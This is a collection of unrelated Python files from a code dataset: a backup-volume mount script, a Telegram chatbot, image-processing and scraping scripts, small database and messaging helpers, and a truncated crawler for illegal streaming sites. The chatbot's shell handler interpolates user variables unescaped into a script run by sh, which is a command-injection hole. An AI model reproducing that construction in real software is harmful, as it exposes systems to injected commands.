+{"seq_id":"509762655","text":"#!/usr/bin/env python\n\"\"\"Instant Volume Mount\"\"\"\n\n# usage: ./instantVolumeMount.py -v mycluster \\\n# -u myuser \\\n# -d mydomain.net \\\n# -s server1.mydomain.net \\\n# -t server2.mydomain.net \\\n# -n 'mydomain.net\\myuser' \\\n# -p swordfish\n\n# import pyhesity wrapper module\nfrom pyhesity import *\nfrom time import sleep\n\n# command line arguments\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vip', type=str, required=True) # cluster to connect to\nparser.add_argument('-u', '--username', type=str, required=True) # username\nparser.add_argument('-d', '--domain', type=str, default='local') # (optional) domain - defaults to local\nparser.add_argument('-s', '--sourceserver', type=str, required=True) # job name\nparser.add_argument('-t', '--targetserver', type=str, default=None) # run date to archive in military format with 00 seconds\nparser.add_argument('-n', '--targetusername', type=str, default='') # (optional) will use policy retention if omitted\nparser.add_argument('-p', '--targetpassword', type=str, default='') # (optional) will use policy target if omitted\nparser.add_argument('-a', '--useexistingagent', action='store_true')\nparser.add_argument('-m', '--volume', action='append', type=str)\n\nargs = parser.parse_args()\n\nvip = args.vip\nusername = args.username\ndomain = args.domain\nsourceserver = args.sourceserver\ntargetserver = args.targetserver\ntargetusername = args.targetusername\ntargetpassword = args.targetpassword\nuseexistingagent = args.useexistingagent\nvolumes = args.volume\n\nif targetserver is None:\n targetserver = sourceserver\n\n# authenticate\napiauth(vip, username, domain)\n\n# find backups for source server\nsearchResults = api('get', '/searchvms?vmName=%s' % sourceserver)\nif searchResults:\n searchResults = [v for v in searchResults['vms'] if v['vmDocument']['objectName'].lower() == sourceserver.lower()]\n\nif len(searchResults) == 0:\n print(\"%s is not protected\" % sourceserver)\n exit(1)\n\n# find newest among multiple jobs\nsearchResult = sorted(searchResults, key=lambda result: result['vmDocument']['versions'][0]['snapshotTimestampUsecs'], reverse=True)[0]\ndoc = searchResult['vmDocument']\n\n# find source and target servers\nentities = api('get', '/entitiesOfType?awsEntityTypes=kEC2Instance&azureEntityTypes=kVirtualMachine&environmentTypes=kVMware&environmentTypes=kPhysical&environmentTypes=kView&environmentTypes=kGenericNas&environmentTypes=kIsilon&environmentTypes=kNetapp&environmentTypes=kAzure&environmentTypes=kAWS&environmentTypes=kGCP&gcpEntityTypes=kVirtualMachine&genericNasEntityTypes=kHost&isProtected=true&isilonEntityTypes=kMountPoint&netappEntityTypes=kVolume&physicalEntityTypes=kHost&viewEntityTypes=kView&vmwareEntityTypes=kVirtualMachine')\nsourceEntity = [e for e in entities if e['displayName'].lower() == sourceserver.lower()]\ntargetEntity = [e for e in entities if e['displayName'].lower() == targetserver.lower()]\n\nif len(sourceEntity) == 0:\n print(\"source server %s not found\")\n exit(1)\n\nif len(targetEntity) == 0:\n print(\"target server %s not found\")\n exit(1)\n\nmountTask = {\n 'name': 'myMountOperation',\n 'objects': [\n {\n 'jobId': doc['objectId']['jobId'],\n 'jobUid': doc['objectId']['jobUid'],\n 'entity': sourceEntity[0],\n 'jobInstanceId': doc['versions'][0]['instanceId']['jobInstanceId'],\n 'startTimeUsecs': doc['versions'][0]['instanceId']['jobStartTimeUsecs']\n }\n ],\n 'mountVolumesParams': {\n 'targetEntity': targetEntity[0],\n 'vmwareParams': {\n 'bringDisksOnline': True,\n 'targetEntityCredentials': {\n 'username': targetusername,\n 'password': targetpassword\n }\n }\n }\n}\n\nif 'parentId' in targetEntity:\n mountTask['restoreParentSource'] = {'id': targetEntity['parentId']}\n\nif useexistingagent:\n mountTask['mountVolumesParams']['useExistingAgent'] = True\n\nif volumes is not None:\n mountTask['mountVolumesParams']['volumeNameVec'] = volumes\n\nprint(\"mounting volumes to %s...\" % targetserver)\nresult = api('post', '/restore', mountTask)\n\n# wait for completion\ntaskid = result['restoreTask']['performRestoreTaskState']['base']['taskId']\nfinishedStates = ['kCanceled', 'kSuccess', 'kFailure']\nstatus = 'unknown'\nwhile status not in finishedStates:\n sleep(3)\n restoreTask = api('get', '/restoretasks/%s' % taskid)\n status = restoreTask[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus']\nprint(\"Volume mount ended with status %s\" % status)\nif status == 'kSuccess':\n print('Task ID for tearDown is: %s' % restoreTask[0]['restoreTask']['performRestoreTaskState']['base']['taskId'])\n mountPoints = restoreTask[0]['restoreTask']['performRestoreTaskState']['mountVolumesTaskState']['mountInfo']['mountVolumeResultVec']\n for mountPoint in mountPoints:\n print('%s mounted to %s' % (mountPoint['originalVolumeName'], mountPoint['mountPoint']))\n","sub_path":"python/instantVolumeMount/instantVolumeMount.py","file_name":"instantVolumeMount.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"510881325","text":"import asyncio\nimport functools\nimport os\nimport signal\nimport traceback\n\nfrom telethon import TelegramClient, events, sync\nfrom subprocess import Popen, PIPE\n\nfrom .bot import HermitBot\nfrom .cli import data_dir\n\n\nclass ShellObject:\n \"\"\"A Bourne Shell object handler for RiveScript.\"\"\"\n _objects = {}\n\n def load(self, name, code):\n source = \"\\n\".join(code)\n self._objects[name] = source\n\n def call(self, rs, name, user, fields):\n if not name in self._objects:\n return \"[ERR: Object Not Found]\"\n script = f'#!/usr/bin/env sh\\n'.encode('utf-8')\n vars = rs.get_uservars(user)\n for key, value in vars.items():\n if type(value) != str:\n continue\n script += f'{key}=\"{value}\"\\n'.encode('utf-8')\n script += self._objects[name].encode('utf-8')\n\n proc = Popen([\"sh\"], stdin=PIPE, stdout=PIPE)\n proc.stdin.write(script)\n proc.stdin.close()\n result = proc.stdout.read().decode('utf-8')\n return result\n\n\nAPP_TOKEN = os.environ['TELEGRAM_APP_TOKEN']\nBOT_TOKEN = os.environ['TELEGRAM_BOT_TOKEN']\nBOT_OWNER = os.environ['TELEGRAM_BOT_OWNER']\nBOT_OWNER_ID = int(os.environ['TELEGRAM_BOT_OWNER_ID'])\nBOT_NAME = os.environ['TELEGRAM_BOT_NAME']\napi_id, api_hash = APP_TOKEN.split(':')\napi_id = int(api_id)\n\nloop = asyncio.get_event_loop()\n\nclient = TelegramClient(BOT_NAME, api_id, api_hash)\n\nhermit = HermitBot(data_dir, debug=False)\n\n\ndef exit_on_signal(signal_name):\n print(\"Exiting on signal:\", signal_name)\n client.send_message(BOT_OWNER, 'I am going offline due to signal: ' + signal_name)\n client.disconnect()\n loop.stop()\n\n\ndef stop_on_error(func):\n async def wrapper(*args, **kwargs):\n try:\n return await func(*args, **kwargs)\n except Exception as e:\n await client.send_message(BOT_OWNER, 'Encountered error, shutting down. ```%s```' % traceback.format_exc())\n client.disconnect()\n loop.stop()\n\n return wrapper\n\n\n@client.on(events.NewMessage(pattern='reload'))\n@stop_on_error\nasync def reload_handler(event):\n if event.from_id != BOT_OWNER_ID:\n print(f\"Ignoring chat from {event.from_id}.\")\n return\n hermit.reload()\n await event.respond('Reloaded.')\n\n\n@client.on(events.NewMessage())\n@stop_on_error\nasync def handler(event):\n if event.from_id != BOT_OWNER_ID:\n print(f\"Ignoring chat from {event.from_id}.\")\n return\n elif event.raw_text == 'reload':\n return\n reply = hermit.reply(event.raw_text)\n if reply:\n await event.respond(reply)\n else:\n await event.respond('Received empty response.')\n\n\ndef main():\n try:\n for signame in ('SIGINT', 'SIGTERM'):\n loop.add_signal_handler(getattr(signal, signame),\n functools.partial(exit_on_signal, signame))\n client.connect()\n if not client.is_user_authorized():\n client.sign_in(bot_token=BOT_TOKEN)\n\n client.send_message(BOT_OWNER, 'I am online.')\n\n loop.run_forever()\n except KeyboardInterrupt:\n client.send_message(BOT_OWNER, 'I am going offline.')\n except Exception as e:\n client.send_message(BOT_OWNER, 'Encountered error, shutting down. ```%s```' % traceback.format_exc())\n finally:\n client.disconnect()\n loop.stop()\n","sub_path":"hermit/tg.py","file_name":"tg.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"302995375","text":"import numpy as np\nimport os\nfrom Funciones_importantes import barrido_polar, diferencia_angulos\nfrom skimage import filters\nfrom PIL import ImageEnhance\nfrom scipy import ndimage, misc\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\nclass Procesamiento_horero_minutero:\n\n def __init__(self, filename):\n self.filename = filename\n self.imagen = Image.open(self.filename).rotate(-90).convert('L')\n self.imagen_binaria = Image.open('mascara.png').convert('L')\n self.horero = None\n self.minutero = None\n self.lista_rectas = []\n\n def realizar_procesamiento(self):\n self.segmentar_reloj()\n self.centro_masa()\n self.lista_rectas = barrido_polar(self.centro, self.imagen)\n os.remove('./imagen_segmentada.png')\n\n def segmentar_reloj(self):\n '''Se procesa la imagen para que quede totalmente\n lista para luego buscarlas manecillas sin ningun problema'''\n #se carga la info de los pixeles de la imagen binaria previamente obtenida\n data_binario = self.imagen_binaria.load()\n # Se carga la info de los pixeles de la imagen original\n data = self.imagen.load()\n #Se recorre la imagen completa\n for x in range(0,self.imagen_binaria.size[0]):\n for y in range(0,self.imagen_binaria.size[1]):\n # Si el pixel no esta dentro de la region segmentada, el pixel se transforma a negro\n if data_binario[x,y] == 0:\n data[x,y] = 0\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.title('RELOJ SEGMENTADO')\n plt.show()\n #Aumentamos el contraste de la imagen\n contr = ImageEnhance.Contrast(self.imagen)\n im = contr.enhance(1.5)\n self.imagen = im\n #Transformamos la imagen a matriz\n imagen = ndimage.rotate(self.imagen, 0)\n #Aplicamos otsu\n val = filters.threshold_otsu(imagen)\n arr = np.asarray(imagen>val)\n #Tranformamos la imagen en escala de grises a una imagen binaria\n self.imagen = ndimage.binary_opening(arr)\n #Se guarda la imagen binaria segmentada\n misc.imsave('imagen_segmentada.png',self.imagen)\n #Se carga la imagen\n self.imagen = Image.open('imagen_segmentada.png').convert('L')\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.title('RELOJ BINARIO SEGMENTADO')\n plt.show()\n\n\n def centro_masa(self):\n '''Metodo que busca el centro de masa\n de la 'mascara' (region segmentada)'''\n c = ndimage.measurements.center_of_mass(ndimage.rotate(self.imagen_binaria,0))\n self.centro = (int(c[1]), int(c[0]))\n\n def buscar_minutero(self):\n 'Busca la manecilla correspondiente al minutero'\n max_ceros = 0\n #Itera sobre todas las rectas para encontrar la recta con mayor cantidad de ceros\n for recta in self.lista_rectas:\n ceros = recta.contar_ceros()\n if ceros > max_ceros:\n max_ceros = ceros\n self.minutero = recta\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.scatter(self.centro[0], self.centro[1], c='red')\n plt.scatter(self.minutero.x2, self.minutero.y2, c='red')\n plt.scatter(self.minutero.centro[0], self.minutero.centro[1])\n plt.title('RESULTADO BUSQUEDA MINUTERO')\n plt.show()\n #Retorna el angulo del minutero\n return self.minutero.theta\n\n def buscar_horero(self):\n '''Busca la manecilla correspondiente al horero. Se debe\n buscar primeroel minutero para buscar el horero'''\n max_ceros = 0\n #Se itera sobre todas las rectas\n for recta in self.lista_rectas:\n ceros = recta.contar_ceros()\n #Si la recta tiene mas ceros que la anteriormente seleccionada, está ubicada a mas de 8 pixeles de\n #distancia del minutero en el eje x e y, y ademas tiene una diferencia de angulo de mas de 5 grados\n #con respecto al minutero\n if ceros > max_ceros and abs(recta.x2 - self.minutero.x2)>8 and abs(recta.y2 - self.minutero.y2)>8 and diferencia_angulos(self.minutero.theta, recta.theta)>5 :\n max_ceros = ceros\n self.horero = recta\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.scatter(self.centro[0], self.centro[1], c='red')\n plt.scatter(self.horero.x2, self.horero.y2, c='red')\n plt.scatter(self.horero.centro[0], self.horero.centro[1])\n plt.title('RESULTADO BUSQUEDA HORERO')\n plt.show()\n return self.horero.theta","sub_path":"PROCESAMIENTO_DE_IMAGENES/T01/Procesamiento_horero_minutero.py","file_name":"Procesamiento_horero_minutero.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"87951063","text":"\n# Find the sum of all left leaves in a given binary tree.\n#\n# Example:\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n#\n# There are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def add_left_leaves(self, node, is_left):\n if not node:\n return 0\n return node.val if is_left and not node.left and not node.right \\\n else self.add_left_leaves(node.left, True) + self.add_left_leaves(node.right, False)\n\n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return 0 if not root \\\n else self.add_left_leaves(root.left, True) + self.add_left_leaves(root.right, False)\n\n\nif __name__ == '__main__':\n s = Solution()\n from LeetcodeProblems.tree.tree_node import TreeNode\n tree = TreeNode([5, 3, 6])\n print(s.sumOfLeftLeaves(tree))\n","sub_path":"LeetcodeProblems/tree/404_sum_of_left_leaves.py","file_name":"404_sum_of_left_leaves.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"89426823","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\tAruco Marker Creation\n\n\t1.) Create 4 aruco markers images for chessboard corner detection.\n\n\t\t\t\t\t\t\t\tm0\t m1\n\t\t\t\t\t\t\t\t B\n\t\t\t\t\t\t\t\tm3 m2\n\n\t\t\t\t\t\t (marker arrangment)\n\n\t\t\twhere,\n\n\t\t\t\tmi ~ Aruco marker with associate id \"i\"\n\t\t\t\tB ~ Chessboard\n\n\t2.) Create json settings file.\n\n\n\tTODO: use marker images to calibrate camera in single step\n\n\"\"\"\n\n__author__ = \"l.j. Brown\"\n__version__ = \"1.0.3\"\n\n#\n#\n#\t\t\t\t\t\t\t\t\timports\t\n#\n#\n\n# internal\nimport json\nimport logging\n\n# external\nimport numpy as np\nimport cv2\nimport cv2.aruco as aruco\n\n#\n#\n#\t\t\t\t\t\t\t\t\tSettings\n#\n#\n\nARUCO_MARKER_SETTINGS_FNAME = \"aruco_markers/aruc_markers_settings.json\" \t\t# Do not change\naruco_markers_ftemplate = \"aruco_markers/aruco_%s.png\"\n\nmarker_size = 400\t# pixels\n\naruco_dict_id = aruco.DICT_6X6_250\ncorner_id_dict = {\n\t0 : 'top_left',\n\t1 : 'top_right',\n\t2 : 'bottom_right',\n\t3 : 'bottom_left'\n}\n\n#\n#\taruco marker settings dictonary\n#\n\nsettings_dict = {\n\t\"ARUCO_MARKER_SETTINGS_FNAME\" : ARUCO_MARKER_SETTINGS_FNAME,\n\t\"aruco_markers_ftemplate\" : aruco_markers_ftemplate,\n\t\"corner_id_dict\" : corner_id_dict,\n\t\"aruco_dict_id\" : aruco_dict_id,\n\t\"marker_size\" : marker_size\n}\n\n#\n#\n#\t\t\t\t\t\t\t\t\tLogging\n#\n#\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#\n#\n#\t\t\t\t\t\t\t\t\tMethods\n#\n#\n\n#\n#\twrite settings to json file\n#\n\ndef write_settings_file(settings_dict):\n\n\t# retreive file name\n\tARUCO_MARKER_SETTINGS_FNAME = settings_dict[\"ARUCO_MARKER_SETTINGS_FNAME\"]\n\n\t# logger\n\tlogger.info(\"Writing aruco marker settings file (json file) too \\\"%s\\\"\" % ARUCO_MARKER_SETTINGS_FNAME)\n\n\t# write json file\n\twith open(ARUCO_MARKER_SETTINGS_FNAME, 'w') as outfile:\n\t json.dump(settings_dict, outfile)\n\n\t# logger\n\tlogger.info(\"Finished writing aruco marker settings file.\")\n\n\n#\n#\tcreate markers -- and write settings file\n#\n\ndef create_markers(settings_dict):\n\n\t# write settings dict to json file\n\twrite_settings_file(settings_dict)\n\n\t# get file template for individual aruco marker image\n\taruco_markers_ftemplate = settings_dict[\"aruco_markers_ftemplate\"]\n\n\t# load aruco dict\n\taruco_dict = aruco.Dictionary_get(settings_dict[\"aruco_dict_id\"])\n\n\t# get number of markers\n\tnMarkers = len(settings_dict[\"corner_id_dict\"])\n\t\n\t# get marker size\n\tmarkerSize = settings_dict[\"marker_size\"]\n\n\t# create marker image files and write them\n\tfor k,v in settings_dict[\"corner_id_dict\"].items():\n\t\tmarker_img = aruco.drawMarker(aruco_dict, k, markerSize)\n\t\tfpath = aruco_markers_ftemplate % v\n\n\t\t# logger\n\t\tlogger.info(\"Writing aruco marker image file to \\\"%s\\\"\" % fpath)\n\t\t\n\t\tcv2.imwrite(fpath, marker_img)\n\n\t# logger\n\tlogger.info(\"Finished writing aruco marker image files.\")\n\n#\n#\n#\t\t\t\t\t\t\t\tProgram\n#\n#\n\nif __name__ == \"__main__\":\n\n\t#\n\t# create marker images and settings file\n\t#\n\n\tcreate_markers(settings_dict)\n","sub_path":"chessboard_corner_detection/old_code/aruco_marker_creation_v3.py","file_name":"aruco_marker_creation_v3.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"527824937","text":"'''''Andressa 31786812, João Victor 31841287, Reinaldo 31877923'''''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv('axisdata.csv')\r\n\r\nvalor_max = df[\"Cars Sold\"].max()\r\n\r\nlista_valor_max = df.loc[df[\"Cars Sold\"] == valor_max]\r\n\r\nlista_nomes_max = lista_valor_max[\"Fname\"]\r\n\r\nprint(\"Os vendedores que atingiram essa marca foram:\\n{}\".format(lista_nomes_max))\r\n\r\nprint(\"A quantidade máxima de carros vendidos foi de: {}\".format(valor_max))","sub_path":"aula 1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"180128511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 19:22:47 2020\n@author: katharinaenin\n\"\"\"\n\n#Webscraper for AMA\n\nimport requests\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n#starting page or root page\nroot_url='https://www.ama.org/marketing-news-archive/'\npage = requests.get(root_url).text\n\nsoup = BeautifulSoup(page, features=\"lxml\")\n\nlink_list = np.array([]);\n\nfile = open(\"OutputAMA.txt\",\"w\");\n\nnumber_article = 0;\n\n#get all the links to monthly archive pages\nfor a in soup.select('.wp-block-column h3 a'):\n link_list = np.append(link_list,a.get('href')); #alle Monatslinks\n \n \n#extract content \nfor month_link in link_list: \n \n #Load More Button entgehen\n url1 = month_link;\n url2 = month_link+'?paged=2';\n url3 = month_link+'?paged=3';\n month_links = [url1,url2,url3];\n \n for month_link_page in month_links: \n new_url = month_link_page;\n page = requests.get(new_url).text\n soup = BeautifulSoup(page, features=\"lxml\")\n \n for link in soup.findAll('a',{\"class\": \"content-card-url\"}):\n url = link.get('href');\n page = requests.get(url).text\n soup = BeautifulSoup(page)\n \n headline = soup.find('h1').get_text()\n sub_headline = soup.find('h2').get_text()\n p_tags = soup.find_all('p');\n p_tags_text = [tag.get_text().strip() for tag in p_tags] \n \n p_tags_text = p_tags_text[3:-2]\n file.writelines(headline);\n file.writelines(\"\\n\");\n file.writelines(sub_headline);\n file.writelines(\"\\n\");\n file.writelines(p_tags_text);\n file.writelines(\"\\n \\n\"); \n number_article = number_article + 1;\n \nfile.close();\n","sub_path":"webscraper4.py","file_name":"webscraper4.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"333871958","text":"from google.appengine.api import mail, app_identity\nimport logging\nfrom datetime import datetime\n\n\ndef send(recipients, subject, body):\n isHTML=True\n # print(\"recep: \"+recipients)\n logging.debug(u'Sending mail {} to {}'.format(subject, unicode(recipients)).encode(u'utf-8'))\n\n message = mail.EmailMessage(\n sender=u'Admin VeggsProno '.format(app_identity.get_application_id()),\n subject=subject,\n to=recipients\n )\n\n if isHTML:\n message.html = body\n else:\n message.body = body\n\n message.check_initialized()\n message.send()","sub_path":"src/blueprint/services/email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"94967370","text":"\"\"\"\n Learning persistence with Peewee and sqlite\n delete the database to start over\n (but running this program does not require it)\n\"\"\"\nimport logging\nfrom personjob_model import *\n\ndef populate_db():\n \"\"\"\n add person data to database\n \"\"\"\n\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n\n database = SqliteDatabase('personjob.db')\n\n logger.info('Working with Person class')\n logger.info('Note how I use constants and a list of tuples as a simple schema')\n logger.info('Normally you probably will have prompted for this from a user')\n\n dept_number = 0\n dept_name = 1\n dept_manager = 2\n\n department = [\n ('A001', 'Comms', 'Andy'),\n ('B002', 'Marketing', 'Tammy'),\n ('C003', 'Fancy', 'Beannie'),\n ]\n\n logger.info('Creating Person records: iterate through the list of tuples')\n logger.info('Prepare to explain any errors with exceptions')\n logger.info('and the transaction tells the database to fail on error')\n\n try:\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n for department in department:\n with database.transaction():\n new_dept = Department.create(\n dept_number = department[dept_number],\n dept_name = department[dept_name],\n dept_manager = department[dept_manager])\n new_dept.save()\n logger.info('Database add successful')\n\n logger.info('Print the Department records we saved...')\n for saved_dept in Department:\n logger.info(f'{saved_dept.dept_number} department is for {saved_dept.dept_name} ' +\\\n f'and likes to be known as {saved_dept.dept_manager}')\n\n except Exception as e:\n logger.info(f'Error creating = {department[dept_number]}')\n logger.info(e)\n logger.info('See how the database protects our data')\n\n finally:\n logger.info('database closes')\n database.close()\n\nif __name__ == '__main__':\n populate_db()","sub_path":"Student/tammyd_Py220/Py220_lesson07/RDBMS-example-master/use_these/personjob_learning_v3_p1.py","file_name":"personjob_learning_v3_p1.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"322308772","text":"def main():\n print(\"Please enter a number to represent the age of the child.\")\n age_in_years = int(input())\n age_in_months = convert_to_months(age_in_years)\n print(\"The age of the camper in months is:\",age_in_months)\n\n\ndef convert_to_months(years):\n age = years * 12\n\n return (age)\n\n\nif __name__ == '__main__':\n main()\n\n\n#bugs: In the initial draft of the program,\n#I had the print statement called like is:+age_in_months)\n#This had the odd side effect of printing out none of the correct values.( the year repeated 6-8 times)\n#This is apparently because the + operation in the print statement is only for strings.\n\n","sub_path":"Classes/Python/Module 2/main/camper_age_input.py","file_name":"camper_age_input.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"305425784","text":"from linebot import LineBotApi\r\nfrom linebot.models import TextSendMessage\r\n\r\n# リモートリポジトリに\"ご自身のチャネルのアクセストークン\"をpushするのは、避けてください。\r\n# 理由は、そのアクセストークンがあれば、あなたになりすまして、プッシュ通知を遅れてしまうからです。\r\nLINE_CHANNEL_ACCESS_TOKEN = \"ご自身のチャネルのアクセストークン\"\r\n\r\nline_bot_api = LineBotApi(LINE_CHANNEL_ACCESS_TOKEN)\r\n\r\n\r\ndef main():\r\n user_id = \"プッシュ通知を送りたLINEユーザーのuser_id\"\r\n\r\n messages = TextSendMessage(text=f\"こんにちは😁\\n\\n\"\r\n f\"最近はいかがお過ごしでしょうか?\")\r\n line_bot_api.push_message(user_id, messages=messages)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"push_message.py","file_name":"push_message.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"51089621","text":"import iemdb, numpy\nimport datetime\nCOOP = iemdb.connect('coop', bypass=True)\nccursor = COOP.cursor()\n\nccursor.execute(\"\"\"select o.station, o.day, o.high, c.high, o.low, c.low from \n alldata_ia o JOIN climate c ON \n (c.station = o.station and to_char(c.valid, 'mmdd') = o.sday) \n and o.station = 'IA0200' and o.day >= '2012-12-01' ORDER by day ASC\"\"\")\n\ndays = []\ndays2 = []\nohighs = []\nolows = []\nchighs = []\nclows = []\nfor row in ccursor:\n days.append( datetime.datetime(row[1].year, row[1].month, row[1].day, 0) - datetime.timedelta(hours=6) )\n days2.append( datetime.datetime(row[1].year, row[1].month, row[1].day, 0) )\n ohighs.append( row[2] )\n chighs.append( row[3] )\n olows.append( row[4] )\n clows.append( row[5] )\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\n\n(fig, ax) = plt.subplots(1, 1)\n\nax.bar(days, ohighs, width=0.25, fc='r', ec='r', label=\"High\")\nax.bar(days2, olows, width=0.25, fc='b', ec='b', label=\"Low\")\n\nax.plot(days, chighs, linewidth=4, zorder=2, color='k')\nax.plot(days, chighs, linewidth=2, zorder=2, color='r')\nax.plot(days, clows, linewidth=4, zorder=2, color='k')\nax.plot(days, clows, linewidth=2, zorder=2, color='b')\nax.set_xlim(datetime.datetime(2012,11,29,23),datetime.datetime(2013,1,7))\n#ax.set_ylim(50,85)\nax.annotate(\"19-20 Dec Snowstorm\", xy=(datetime.datetime(2012,12,20), 35), xycoords='data',\n xytext=(10, 50), textcoords='offset points',\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle3,angleA=0,angleB=-90\"))\n \nax.grid(True)\nax.set_title(\"1 Dec 2012 - 7 Jan 2013 : Ames Daily Temperatures\")\n#ax.set_xlabel(\"16-20 Forecasted\")\nax.set_ylabel(\"Temperature $^{\\circ}\\mathrm{F}$\")\nax.legend()\nfig.savefig('test.ps')\nimport iemplot\niemplot.makefeature('test')\n","sub_path":"scripts/feature/daily_climate.py","file_name":"daily_climate.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"464413847","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pyvirtualdisplay import Display\nfrom urllib.parse import urljoin, urlparse, parse_qsl, unquote_plus\nimport random\nimport re\nimport sys\n\nfrom linkFollow import LinkFollow\nimport redirectChainExtractor as rce\nfrom config import Config\n\ndef getMovieTitles():\n\n movieTitles = set()\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'}\n years = ['2019','2018','2017','2016','2015']\n # Movie titles\n for year in years:\n url = 'https://www.boxofficemojo.com/yearly/chart/?view=releasedate&view2=domestic&yr='+year+'&p=.htm'\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n links = soup.find_all('a')\n for link in links:\n if(link.has_attr('href') and link['href'].startswith('/movies/?id=')):\n title = re.sub('[^0-9a-zA-Z]+', ' ', link.text.lower())\n title = ' '.join([x for x in title.split(' ') if len(x) > 3])\n if(len(title) > 5):\n movieTitles.add(title)\n # Load TV series titles\n seriesTitles = set()\n url = 'https://www.imdb.com/search/title?title_type=tv_series&view=simple&sort=moviemeter,asc&start=1&count=200'\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n titleDivs = soup.find_all('div', {'class': 'lister-col-wrapper'})\n for titleDiv in titleDivs:\n link = titleDiv.find('a')\n title = re.sub('[^0-9a-zA-Z]+', ' ', link.text.lower())\n title = ' '.join([x for x in title.split(' ') if len(x) > 3])\n if(len(title) > 5 and title not in movieTitles):\n seriesTitles.add(title)\n print('Number of movie titles loaded: ',len(movieTitles))\n print('Number of series titles loaded: ',len(seriesTitles))\n return [x.split(' ') for x in movieTitles], [x.split(' ') for x in seriesTitles]\n \n\ndef getBaseUrl(url,soup):\n\n baseUrl = url\n if(soup is not None):\n base = soup.find('base')\n if((base is not None) and base.has_attr('href')):\n baseUrl = urljoin(baseUrl,base['href'])\n return baseUrl\n \n \ndef isUrlValid(url):\n\n regex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n return re.match(regex, url) is not None \n\n \ndef findTitleInPart(part, titles):\n\n if(len(part) < 6):\n return False\n for title in titles:\n movieness = 0\n for word in title:\n if(part.find(word) != -1):\n movieness += 1\n if(len(title) == 1 or movieness == 2):\n return True\n return False\n \n \ndef isMovieUrl(url,titles):\n\n parts = urlparse(url)\n queries = parse_qsl(parts.query)\n path = unquote_plus(parts.path)\n if(len(path) > 0 and path[-1] == '/'):\n path = path[:-1]\n pathEnd = path.split('/')[-1]\n for query in queries:\n part = unquote_plus(query[1])\n if(findTitleInPart(part.lower(),titles)):\n return True\n if(findTitleInPart(pathEnd.lower(),titles)):\n return True\n return False\n \n \ndef findIllegalStreams(movieTitles, seriesTitles):\n\n sampleSize = 4\n finalUrls = {}\n url = 'https://en.softonic.com/solutions/what-are-the-best-free-movie-streaming-sites-without-sign-up'\n # now redirects to: https://binge.co/what-are-the-best-free-movie-streaming-sites-without-sign-up\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 